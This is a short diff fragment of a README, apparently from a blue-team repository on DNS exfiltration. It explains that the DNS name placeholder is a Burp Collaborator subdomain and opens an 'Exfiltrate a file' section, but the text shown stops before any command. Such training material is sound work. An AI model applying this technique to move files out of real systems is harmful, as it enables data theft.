sans-blue-team/DNS-Exfiltrate/README.md

 Note that you will receive more reliable results by specifying the name server via `dig @`...

+In the examples below: `<DNS Name>` is the random name proovided by Burp Collaborator.
+For example: `q3uv485lz802ad6a7xz6c2izvq1hp6` if your Beef Collaborator address is `q3uv485lz802ad6a7xz6c2izvq1hp6.oastify.com`.

 ### Exfiltrate a file:

 ```